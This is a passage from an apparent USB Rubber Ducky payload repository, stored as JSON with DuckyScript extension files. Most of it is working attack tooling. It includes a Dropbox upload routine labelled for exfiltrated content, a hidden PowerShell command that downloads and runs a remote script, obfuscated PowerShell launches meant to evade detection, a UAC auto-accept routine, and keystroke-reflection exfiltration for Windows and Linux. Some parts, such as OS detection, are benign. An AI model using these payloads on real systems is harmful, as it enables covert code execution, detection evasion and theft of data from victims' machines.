Version: 1.1\n END_REM\n\n REM Required options:\n DEFINE #PTD_CONTENT $Content\n DEFINE #PTD_REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n DEFINE #PTD_APP_KEY XXXXXXXXXXXXXXX\n DEFINE #PTD_APP_SECRET XXXXXXXXXXXXXXX\n\n REM Advanced options:\n DEFINE #PTD_OUTPUT_FOLDER Exfiltrated-content\n DEFINE #PTD_OUTPUT_FILE [${env:COMPUTERNAME}-${env:USERNAME}].txt\n\n FUNCTION PTD_SEND()\n STRING_POWERSHELL\n try { \n Invoke-RestMethod -Uri \"https://content.dropboxapi.com/2/files/upload\" -Method Post -Headers @{ \n \"Authorization\" = \"Bearer $((\n Invoke-RestMethod -Uri \"https://api.dropboxapi.com/oauth2/token\" -Method Post -Headers @{ \n \"Content-Type\" = \"application/x-www-form-urlencoded\" \n } -Body @{ \n \"grant_type\" = \"refresh_token\"; \n \"refresh_token\" = \"#PTD_REFRESH_TOKEN\"; \n \"client_id\" = \"#PTD_APP_KEY\"; \n \"client_secret\" = \"#PTD_APP_SECRET\" \n }\n ).access_token)\"; \n \"Content-Type\" = \"application/octet-stream\"; \n \"Dropbox-API-Arg\" = \"{\"\"path\"\":\"\"/#PTD_OUTPUT_FOLDER/#PTD_OUTPUT_FILE\"\",\"\"mode\"\":\"\"add\"\",\"\"autorename\"\":true,\"\"mute\"\":false}\" \n } -Body #PTD_CONTENT | Out-Null \n } \n catch { \n Write-Host \"An error occurred: $_\" \n }\n END_STRING\n END_FUNCTION\nEND_EXTENSION\n" }, { "path": "payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION", "content": "EXTENSION ROLLING_POWERSHELL_EXECUTION\n REM VERSION 1.0\n REM Author: 0i41E\n REM OS: Windows\n REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek\n REM Requirements: PayloadStudio v.1.3 minimum\n REM Starts Powershell in uncommon ways to avoid basic detection\n REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.\n\n REM CONFIGURATION:\n REM Add ExecutionPolicy bypass\n DEFINE #EXECUTIONPOLICY FALSE\n DEFINE #DELAY 200\n\n $_RANDOM_MIN = 1\n $_RANDOM_MAX = 16\n VAR $RANDOM_PS = $_RANDOM_INT\n FUNCTION Rolling_Powershell_Execution()\n IF ($RANDOM_PS == 1) THEN\n STRING cmd.exe /c \"p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid\"\n ELSE IF ($RANDOM_PS == 2) THEN\n STRING cmd.exe /c \"PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi\"\n ELSE IF ($RANDOM_PS == 3) THEN\n STRING cmd.exe /c \"P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi\"\n ELSE IF ($RANDOM_PS == 4) THEN\n STRING cmd /c \"FOR /F \"delims=s\\ t%PSModulePath:~25,1%kens=4\" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H\"\n ELSE IF ($RANDOM_PS == 5) THEN\n STRING cmd /c \"Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi\"\n ELSE IF ($RANDOM_PS == 6) THEN\n STRING cmd /c \"p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD\"\n ELSE IF ($RANDOM_PS == 7) THEN\n STRING cmd.exe /c \"P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi\"\n ELSE IF ($RANDOM_PS == 8) THEN\n STRING powershell -NoPro -noninT -win h\n ELSE IF ($RANDOM_PS == 9) THEN\n STRING cmd /c \"p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD\"\n ELSE IF ($RANDOM_PS == 2) THEN\n STRING powershell.exe -NoP -nOni -W h\n ELSE IF ($RANDOM_PS == 10) THEN\n STRING cmd /c \"FOR /F \"delims=s\\ tokens=4\" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H\"\n ELSE IF ($RANDOM_PS == 11) THEN\n STRING powershell -nopr -noninT -W HiddEn\n ELSE IF ($RANDOM_PS == 12) THEN\n STRING cmd.exe /c \"FOR /F \"delims=s\\ tokens=4\" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi\"\n ELSE IF ($RANDOM_PS == 13) THEN\n STRING cmd /c \"P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h\"\n ELSE IF ($RANDOM_PS == 14) THEN\n STRING powershell -noproF -noni -W Hi\n ELSE IF ($RANDOM_PS == 15) THEN\n STRING cmd /c \"Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi\"\n ELSE ($RANDOM_PS == 16) THEN\n STRING powershell.exe -noP -nOnI -windo H\n END_IF\n\n\n IF_DEFINED_TRUE #EXECUTIONPOLICY\n SPACE\n IF (($RANDOM_PS % 2) == 0) THEN\n STRING -ep ByPasS\n ELSE IF (($RANDOM_PS % 5) == 0) THEN\n STRING -exec bypass\n ELSE IF (($RANDOM_PS % 7) == 0) THEN\n STRING -exeC byPasS\n ELSE IF (($RANDOM_PS % 10) == 0) THEN\n STRING -exEcUtionPoL bYpaSs\n ELSE IF (($RANDOM_PS % 12) == 0) THEN\n STRING -exEcUtion bYPaSs\n ELSE\n STRING -eP BYPaSs\n END_IF\n END_IF_DEFINED\n ENTER\n DELAY #DELAY\n END_FUNCTION\n REM EXAMPLE USAGE AFTER EXTENSION\n REM DELAY 2000\n REM GUI r\n REM DELAY 2000\n REM Rolling_Powershell_Execution()\nEND_EXTENSION\n" }, { "path": "payloads/extensions/community/RUN_HOSTED_POWERSHELL", "content": "EXTENSION RUN_HOSTED_POWERSHELL\n REM_BLOCK DOCUMENTATION\n Title: Run Hosted PowerShell\n Author: PlumpyTurkey\n Description: This extension allows you to run a hosted PowerShell script using the Windows Run dialog box.\n Target: Windows 10, 11\n Version: 1.1\n END_REM\n\n REM Required options:\n DEFINE #RHP_SCRIPT_URL example.com\n\n REM Advanced options:\n DEFINE #RHP_DELAY 2000\n DEFINE #RHP_ELEVATED_EXECUTION FALSE\n DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE\n\n FUNCTION RHP_RUN()\n GUI r\n\n DELAY #RHP_DELAY\n STRING PowerShell -W H -EX Bypass \"IWR -UseB '#RHP_SCRIPT_URL' | IEX\"\n\n IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION\n CTRL SHIFT ENTER\n DELAY #RHP_DELAY\n LEFT\n END_IF_DEFINED\n\n ENTER\n\n IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION\n ATTACKMODE OFF\n END_IF_DEFINED\n END_FUNCTION\nEND_EXTENSION\n" }, { "path": "payloads/extensions/community/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE/README.md", "content": "# Save Files In Rubber Ducky Storage - Windows\n\nThis extension can be used to save one or more files through the USB Rubber Ducky storage without having to copy and paste reused code every time, but standardizing a methodology that avoids errors.\n\n```\nHow many files do you want to save?\n|\n|-- Single File\n| |\n| |-- Do you already know the full file path? (e.g., C:\\Users\\Aleff\\Downloads\\photo.png)\n| | |\n| | |-- Use the SINGLE_FILE version\n| | | |\n| | | |-- Set #FLAG_SINGLE_FILE to TRUE\n| | | |-- Define the file path in #SINGLE_PATH\n| | |\n| |-- Don't know the full path but can obtain it at runtime through PowerShell?\n| | |\n| | |-- Use the $fileToSavePath variable\n| | | |\n| | | |-- Set #FLAG_SINGLE_FILE to TRUE\n| | | |-- Obtain the file path through PowerShell and assign it to $fileToSavePath\n|\n|-- Multiple Files\n| |\n| |-- Set the #FLAG_SINGLE_FILE variable to FALSE\n| | |\n| | |-- Use an array of strings named $fileToSavePaths to collect the paths of all the files you want to use\n\n```\n\n\n## Target Environment\n\n- **Target**: Windows PowerShell\n\n## Usage\n\nInsert this extension when you have one or more files that you want to save via USB Rubber Ducky storage.\n\n## Configuration\n\nBefore using the extension, you need to configure it by setting certain variables in the DuckyScript payload. Here are the configuration options:\n\n### Driver Label\n\nThis extension utilizes the 'Get-Volume' command to scan the available volumes on the computer where the command is executed, aiming to detect our USB Rubber Ducky device. Upon detection, the device is selected to serve as a reference, allowing us to perform data saving operations. By default, USB Rubber Duckys are identified by the label 'DUCK'. However, this label can be altered, particularly if we want to keep the operation discreet. If the default label has been changed, it will be necessary to update the #DRIVER_LABEL variable with the correct label.\n\n### Single File or Multiple Files\n\nYou can choose to send a single file or multiple files. Configure the extension accordingly.\n\n#### Single File Configuration\n\n- **Variable**: #FLAG_SINGLE_FILE\n- **Type**: Boolean (TRUE or FALSE)\n- **Description**: Set #FLAG_SINGLE_FILE to TRUE if you want to save just one file. In this case, you will need to specify the file path within the #SINGLE_PATH variable. Alternatively, you can acquire the file path at runtime via PowerShell and store it in the $fileToSavePath variable.\n\nExample in DuckyScript:\n```DuckyScript\nDEFINE #FLAG_SINGLE_FILE TRUE\nDEFINE #SINGLE_PATH C:\\Users\\Aleff\\Downloads\\photo.png\n```\n\nExample in PowerShell before using the extension:\n```powershell\n$fileToSavePath = \"C:\\Users\\Aleff\\Downloads\\photo.png\"\n```\n\n#### Multiple Files Configuration\n\n- **Variable**: #FLAG_SINGLE_FILE\n- **Type**: Boolean (TRUE or FALSE)\n- **Description**: Set #FLAG_SINGLE_FILE to FALSE if you want to save multiple files. In this case, in PowerShell, you will have to create the variable $fileToSavePaths, which is an array of strings containing the list of paths related to the files you want to export.\n\nExample in PowerShell before using the extension:\n```powershell\n$fileToSavePaths = @(\n \"C:\\Users\\Aleff\\Downloads\\photo.png\",\n \"C:\\Users\\Aleff\\Downloads\\document.pdf\",\n \"C:\\Users\\Aleff\\Downloads\\song.mp3\"\n)\n```\n\n**Tips for Working with Arrays in PowerShell:**\n\n- How to create an array:\n ```powershell\n $fileToSavePaths = @()\n ```\n\n- How to add an element to the array:\n ```powershell\n $fileToSavePaths += \"C:\\Users\\Aleff\\Downloads\\photo.png\"\n ```\n\n- How to view the array:\n ```powershell\n $fileToSavePaths\n ```\n\nThat's it! You can now use this extension with the appropriate configuration to save files via the USB Rubber Ducky storage using the same USB Rubber Ducky.\n\n" }, { "path": "payloads/extensions/community/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE_WINDOWS.txt", "content": "EXTENSION SAVE_FILES_IN_RUBBER_DUCKY_STORAGE_WINDOWS\n REM VERSION 1.0\n REM AUTHOR: Aleff\n REM_BLOCK Documentation\n This extension is used to save one or more files through the USB Rubber Ducky storage.\n\n TARGET:\n Windows 10/11\n\n USAGE:\n Insert this extension when you have one or more files that you want to save in your USB Rubber Ducky.\n\n CONFIGURATION:\n Set #DRIVER_LABEL variable with the correct Label of your USB Rubber Ducky considering that the default value is 'DUCK'.\n\n Set #FLAG_SINGLE_FILE with TRUE if you want to save just one file.\n In this case you will need to specify the file path within the #SINGLE_PATH variable OR, in case the exact path to the file you can only acquire it at runtime and so via the powershell, use in the powershell the $fileToSavePath variable to capture this path.\n i.e. in DuckyScript EXTENSION\n DEFINE #SINGLE_PATH C:\\Users\\Aleff\\Downloads\\photo.png\n i.e. in PowerShell before extension\n $fileToSavePath = \"C:\\Users\\Aleff\\Downloads\\photo.png\"\n\n Set #FLAG_SINGLE_FILE FALSE if you want to send multiple files.\n In this case in the PowerShell you will have to create the variable $fileToSavePaths, which is an array of strings that should contain the list of paths related to the files you want to save.\n i.e. in PowerShell before extension:\n $fileToSavePaths = @(\n \"C:\\Users\\Aleff\\Downloads\\photo.png\",\n \"C:\\Users\\Aleff\\Downloads\\document.pdf\",\n \"C:\\Users\\Aleff\\Downloads\\song.mp3\"\n )\n Some tips:\n How to create an Array?\n > $fileToSavePaths = @()\n How to add an element?\n > $fileToSavePaths += \"C:\\Users\\Aleff\\Downloads\\photo.png\"\n How to see the array?\n > $fileToSavePaths\n END_REM\n REM Settings\n DEFINE #DRIVER_LABEL DUCK\n DEFINE #FLAG_SINGLE_FILE FALSE\n DEFINE #SINGLE_PATH 0\n\n REM Extension Code\n FUNCTION SAVE_SINGLE_FILE()\n IF ( #SINGLE_PATH != 0 ) THEN\n STRINGLN mv #SINGLE_PATH >> ${m}:\\\n ELSE IF ( #SINGLE_PATH == 0 ) THEN\n STRINGLN mv ${fileToSavePath} >> ${m}:\\\n END_IF\n END_FUNCTION\n\n FUNCTION SAVE_MULTIPLE_FILES()\n STRINGLN\n foreach ($fileToSavePath in $fileToSavePaths) {\n mv ${fileToSavePath} >> ${m}:\\\n }\n END_STRINGLN\n END_FUNCTION\n\n STRINGLN $m=(Get-Volume -FileSystemLabel '#DRIVER_LABEL').DriveLetter;\n IF_DEFINED_TRUE #FLAG_SINGLE_FILE\n SAVE_SINGLE_FILE()\n END_IF_DEFINED\n IF_NOT_DEFINED_TRUE #FLAG_SINGLE_FILE\n SAVE_MULTIPLE_FILES()\n END_IF_DEFINED\nEND_EXTENSION\n" }, { "path": "payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE", "content": "EXTENSION WINDOWS11_CONSOLE_DOWNGRADE\n REM_BLOCK\n Version: 1.0\n Author: 0i41E\n Description: Downgrade the default command prompt of Windows 11 to use Conhost again. \n Afterwards PowerShell can be used with paramters like \"-WindowStyle Hidden\" again.\n END_REM\n\n REM CONFIGURATION:\n REM Used to wait until initial execution\n DEFINE #INPUT_WAIT 2000\n REM GUID for using the legacy console host for terminal execution\n DEFINE #CONHOST B23D10C0-E52E-411E-9D5B-C09FDF709C7D\n \n FUNCTION Console_Downgrade()\n DELAY #INPUT_WAIT \n GUI r\n DELAY 500\n STRINGLN powershell -NoP -NonI\n DELAY 1000\n STRING Set-ItemProperty -Path \"HKCU:\\Console\\%%Startup\" -Name DelegationConsole -Value \"{#CONHOST}\";\n STRINGLN Set-ItemProperty -Path \"HKCU:\\Console\\%%Startup\" -Name DelegationTerminal -Value \"{#CONHOST}\";exit\n END_FUNCTION\n\n REM_BLOCK\n EXAMPLE USAGE AFTER EXTENSION: Downgrade the command prompt via registry, then open a hidden PS instance and execute Calc.exe.\n Console_Downgrade()\n DELAY 2000\n GUI r\n DELAY 2000\n STRINGLN powershell -w h\n DELAY 1500\n STRINGLN calc.exe;exit\n END_REM\nEND_EXTENSION\n" }, { "path": "payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION", "content": "EXTENSION WINDOWS_ELEVATED_EXECUTION\n REM VERSION 1.1\n REM Author: 0i41E\n REM Executes the desired program with elevated privileges\n REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts\n REM additional extensions\n\n REM CONFIGURATION:\n REM Used to wait for the UAC prompt to react to input\n DEFINE #INPUT_WAIT 2000\n REM Shortcut for YES across multiple languages\n DEFINE #ENGLISH_ACCEPT ALT y\n DEFINE #GERMAN_ACCEPT ALT j\n DEFINE #SPAIN_ACCEPT ALT s\n \n FUNCTION Elevated_Execution()\n DELAY #INPUT_WAIT \n CTRL-SHIFT ENTER\n DELAY #INPUT_WAIT\n REM Change below for appropriate language\n #GERMAN_ACCEPT\n DELAY #INPUT_WAIT\n END_FUNCTION\n\n REM EXAMPLE USAGE AFTER EXTENSION\n REM DELAY 2000\n REM GUI r\n REM DELAY 2000\n REM STRING powershell\n REM Elevated_Execution()\n REM STRINGLN whoami /priv\n\nEND_EXTENSION\n" }, { "path": "payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL", "content": "EXTENSION WINDOWS_FILELESS_HID_EXFIL\r\n REM VERSION 1.0\r\n REM AUTHOR: 0i41E\r\n\r\n REM_BLOCK DOCUMENTATION\r\n Extension for Keystroke Reflection data exfiltration without putting files on disk.\r\n This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.\r\n\r\n TARGET:\r\n Windows Hosts that supports powershell and SendKeys\r\n\r\n USAGE:\r\n Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.\r\n It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.\r\n\r\n Example Usage:\r\n GUI r\r\n DELAY 500\r\n STRINGLN powershell\r\n DELAY 1000\r\n STRING echo \"This is my test\"\r\n Windows_Fileless_HID_Exfil()\r\n END_REM\r\n\r\n FUNCTION Windows_Fileless_HID_Exfil()\r\n DELAY 250\r\n REM Saving current Keyboard lock keys\r\n SAVE_HOST_KEYBOARD_LOCK_STATE\r\n $_EXFIL_MODE_ENABLED = TRUE\r\n $_EXFIL_LEDS_ENABLED = TRUE\r\n DELAY 500\r\n REM Setting the output as variable\r\n STRING |Out-String|Set-Variable -Name \"DD\";\r\n REM Converting output into Lock Key values\r\n STRING $BL = $DD.ToCharArray();$c = \"\";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';\r\n REM Exfiltrating via Keystroke Reflection\r\n STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit\r\n REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.\r\n WAIT_FOR_SCROLL_CHANGE\r\n LED_G\r\n $_EXFIL_MODE_ENABLED = FALSE\r\n RESTORE_HOST_KEYBOARD_LOCK_STATE\r\n END_FUNCTION\r\nEND_EXTENSION\r\n" }, { "path": "payloads/extensions/detect_ready.txt", "content": "EXTENSION DETECT_READY\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n\n TARGETS:\n Any system that reflects CAPSLOCK will detect minimum required delay\n Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms\n END_REM\n\n REM CONFIGURATION:\n DEFINE #RESPONSE_DELAY 25\n DEFINE #ITERATION_LIMIT 120\n\n VAR $C = 0\n WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))\n CAPSLOCK\n DELAY #RESPONSE_DELAY\n $C = ($C + 1)\n END_WHILE\n CAPSLOCK\nEND_EXTENSION\n" }, { "path": "payloads/extensions/exfil_auto_eof_detect.txt", "content": "EXTENSION EXFIL_AUTO_EOF_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n USAGE:\n Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil\n\n TARGETS:\n Requires reflection of at least 2 lock keys.\n Intended for use on systems that dont reflect more than 2 lock keys.\n END_REM\n\n REM CONFIGURATION\n DEFINE #INACTIVTY_TARGET 10\n\n FUNCTION WAIT_FOR_EOF()\n VAR $CURRENT_CAPSLOCK_STATE = $_CAPSLOCK_ON\n VAR $CURRENT_NUMLOCK_STATE = $_NUMLOCK_ON\n VAR $PROCESSING = TRUE\n VAR $INACTIVITY_COUNT = 0\n WHILE ($PROCESSING)\n DELAY 20 \n IF($CURRENT_CAPSLOCK_STATE != $_CAPSLOCK_ON) THEN\n $CURRENT_CAPSLOCK_STATE = $_CAPSLOCK_ON\n $PROCESSING = TRUE\n LED_G\n ELSE IF($CURRENT_NUMLOCK_STATE != $_NUMLOCK_ON) THEN\n $CURRENT_NUMLOCK_STATE = $_NUMLOCK_ON\n $PROCESSING = TRUE\n LED_R\n ELSE \n $INACTIVTY_COUNT = ($INACTIVTY_COUNT + 1)\n IF ($INACTIVTY_COUNT >= #INACTIVTY_TARGET) THEN\n $PROCESSING = FALSE\n END_IF\n LED_OFF\n END_IF\n END_WHILE\n LED_G\n END_FUNCTION\nEND_EXTENSION\n" }, { "path": "payloads/extensions/hello_os.txt", "content": "EXTENSION HELLO_OS\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n USAGE:\n For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS()\n prints the OS determination\n END_REM\n\n REM Additional Example: Defining custom $_OS enums\n DEFINE #EXTRA_EXAMPLES FALSE\n DEFINE #SOME_OTHER_OS 6\n DEFINE #ANOTHER_OS 7\n\n FUNCTION HELLO_OS() \n IF ($_OS == WINDOWS) THEN\n STRING Hello Windows!\n ELSE IF ($_OS == MACOS) THEN\n STRING Hello Mac!\n ELSE IF ($_OS == LINUX) THEN\n STRING Hello Linux!\n ELSE IF ($_OS == IOS) THEN\n STRING Hello iOS!\n ELSE IF ($_OS == CHROMEOS) THEN\n STRING Hello ChromeOS!\n ELSE IF ($_OS == ANDROID) THEN\n STRING Hello Android!\n IF_DEFINED_TRUE #EXTRA_EXAMPLES\n ELSE IF($_OS == #SOME_OTHER_OS) THEN\n REM Example Only\n STRING HELLO Custom OS Type!\n ELSE IF($_OS == #ANOTHER_OS) THEN\n REM Example Only\n STRING HELLO Another Custom OS Type!\n END_IF_DEFINED\n ELSE\n STRING Hello World!\n END_IF\n END_FUNCTION\nEND_EXTENSION\n" }, { "path": "payloads/extensions/linux_hid_exfil.txt", "content": "EXTENSION LINUX_HID_EXFIL\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM REQUIRES EXTENSION EXFIL_AUTO_EOF_DETECT\n\n REM_BLOCK DOCUMENTATION\n Helpers for Linux Keystroke Reflection data exfiltration\n This payload is a proof of concept for USB HID only Data Exfiltration\n\n TARGET:\n Linux host that supports opening terminal via CTRL ALT t, and xdotool\n\n USAGE:\n REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION\n Prepare data to exfil (in filename defined by TARGET_FILE below)\n with a terminal window already open - call RUN_LINUX_EXFIL()\n\n DEPLOYMENT:\n Plug Ducky into host, wait for the LED to turn (and stay) solid Green.\n END_REM\n\n REM CONFIGURATION:\n REM File on host machine to exfil using Keystroke Reflection attack\n DEFINE #TARGET_FILE filename.txt\n\n DEFINE #SAVE_AND_RESTORE_LOCKS TRUE\n DEFINE #ENABLE_EXFIL_LEDS TRUE\n DEFINE #CLOSE_TERMINAL_AFTER_EXFIL TRUE\n\n REM if TRUE will open terminal, prepare data in #TARGET_FILE, and RUN_LINUX_EXFIL()\n DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE\n\n FUNCTION RUN_LINUX_EXFIL()\n IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS\n LED_OFF\n $_EXFIL_LEDS_ENABLED = TRUE\n END_IF_DEFINED\n\n IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS\n SAVE_HOST_KEYBOARD_LOCK_STATE\n END_IF_DEFINED\n\n $_EXFIL_MODE_ENABLED = TRUE\n STRING_BASH\n c=\"xdotool key --delay 4\";\n bs=$(xxd -b \n #TARGET_FILE\n |cut -d\" \" -f2-7);\n for((i=0;i<${#bs};i++));do \n b=\"${bs:$i:1}\";\n if [[ \"$b\" == \"0\" ]];then \n c+=\" Caps_Lock\";\n fi;\n if [[ \"$b\" == \"1\" ]];then \n c+=\" Num_Lock\";\n fi;\n done;\n $c;\n END_STRING\n\n IF_DEFINED_TRUE #CLOSE_TERMINAL_AFTER_EXFIL\n STRING exit;\n END_IF_DEFINED\n\n ENTER\n\n REM Requires adding EXFIL_AUTO_EOF_DETECT EXTENSION above this one\n WAIT_FOR_EOF()\n\n $_EXFIL_MODE_ENABLED = FALSE\n\n IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS\n $_EXFIL_LEDS_ENABLED = FALSE\n END_IF_DEFINED\n\n IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS\n RESTORE_HOST_KEYBOARD_LOCK_STATE\n END_IF_DEFINED\n END_FUNCTION\n\n IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO\n REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.\n REM DEMO Boot Delay\n DELAY 3000\n REM Open Terminal\n CTRL ALT t\n DELAY 500\n REM Perpare some data in TARGET_FILE\n STRINGLN uname -a>#TARGET_FILE\n REM Exfil data to USB Rubber Ducky using Keystroke Reflection\n RUN_LINUX_EXFIL()\n END_IF_DEFINED\nEND_EXTENSION\n" }, { "path": "payloads/extensions/os_detect.txt", "content": "EXTENSION OS_DETECTION\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n USB Rubber Ducky Host OS Detection\n Generic OS detection at a high view is a moving target\n results may vary greatly depending\n on a combination of many variables:\n - number of testing stages\n - specific devices and versions tested against\n - number of systems testing for (scope)\n - detection techniques (passive/invisible/active/hybrid)\n - overall speed\n - overall accuracy\n\n If all you require is windows vs detection, the\n PASSIVE_WINDOWS_DETECT extension is recommended over this extension.\n\n TARGET:\n DEFAULT - Windows, Mac, Linux\n ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android\n\n USAGE:\n Uncomment the function call below to run this extension inline (here)\n or call DETECT_OS() anywhere in your payload after the extension\n Place this extension and the DETECT_OS() before\n you would like to first reference $_OS to execute payload code conditionally\n\n FEEDBACK:\n As mentioned above, this a moving target (especially for mac systems)\n Please report any issues identifying specific operating systems.\n Your feedback will greatly help solidify the robustness of this extension\n\n DEBUGGING:\n SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output\n END_REM\n\n REM CONFIGURATION:\n REM For Debugging:\n DEFINE #DEBUGGING_OUTPUT FALSE\n DEFINE #ADVANCED_DETECTION FALSE\n REM Timing fine tuning:\n DEFINE #STARTUP_DELAY 1500\n DEFINE #RESTART_WAIT 1000\n DEFINE #CONNECT_WAIT 1000\n DEFINE #OS_DETECT_MODE HID\n DEFINE #OS_DETECT_VID VID_05AC\n DEFINE #OS_DETECT_PID PID_021E\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #HOST_RESPONSE_TIMEOUT 1000\n\n FUNCTION DETECT_OS()\n $_HOST_CONFIGURATION_REQUEST_COUNT = 0\n ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID\n DELAY #STARTUP_DELAY\n SAVE_HOST_KEYBOARD_LOCK_STATE\n\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n IF_DEFINED_TRUE #ADVANCED_DETECTION\n STRING ADVANCED OS DETECT\n ELSE_DEFINED\n STRING OS DETECT\n END_IF_DEFINED\n\n ENTER\n STRING test caps\n END_IF_DEFINED\n\n IF ($_CAPSLOCK_ON == FALSE) THEN\n LED_R\n CAPSLOCK\n DELAY #HOST_RESPONSE_TIMEOUT\n END_IF\n LED_OFF\n\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING test done\n END_IF_DEFINED\n\n IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING received led response\n END_IF_DEFINED\n LED_G\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING prediction: Windows\n END_IF_DEFINED\n $_OS = WINDOWS\n ELSE\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING prediction: Linux\n END_IF_DEFINED\n $_OS = LINUX\n END_IF\n ELSE\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING no led response\n ENTER\n STRING prediciton: MacOS\n END_IF_DEFINED\n $_OS = MACOS\n END_IF\n\n IF_DEFINED_TRUE #ADVANCED_DETECTION\n IF ( $_OS == LINUX ) THEN\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING soft reconnect\n END_IF_DEFINED\n ATTACKMODE OFF\n DELAY #RESTART_WAIT\n ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID\n DELAY #CONNECT_WAIT\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING reconnected\n END_IF_DEFINED\n IF ($_CAPSLOCK_ON == TRUE) THEN\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING caps led on\n ENTER\n STRING test numlock\n END_IF_DEFINED\n NUMLOCK\n DELAY #HOST_RESPONSE_TIMEOUT\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING test done\n END_IF_DEFINED\n IF ($_NUMLOCK_ON == FALSE) THEN\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING no numlock led\n ENTER\n STRING prediciton: ChromeOS\n END_IF_DEFINED\n $_OS = CHROMEOS\n ELSE\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING numlock led on\n ENTER\n STRING testing scrolllock\n END_IF_DEFINED\n SCROLLLOCK\n DELAY #HOST_RESPONSE_TIMEOUT\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING test done\n END_IF_DEFINED\n IF ($_SCROLLLOCK_ON == TRUE) THEN\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING scrolllock led on\n ENTER\n STRING prediciton: Android\n END_IF_DEFINED\n $_OS = ANDROID\n ELSE\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING no scrolllock reply\n ENTER\n STRING prediction: Linux\n END_IF_DEFINED\n $_OS = LINUX\n END_IF\n END_IF\n END_IF\n ELSE IF ($_OS == MACOS) THEN\n IF ($_CAPSLOCK_ON == TRUE) THEN\n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING caps led on\n ENTER\n STRING prediction: iOS\n END_IF_DEFINED\n $_OS = IOS\n ELSE \n IF_DEFINED_TRUE #DEBUGGING_OUTPUT\n ENTER\n STRING no caps reply\n ENTER\n 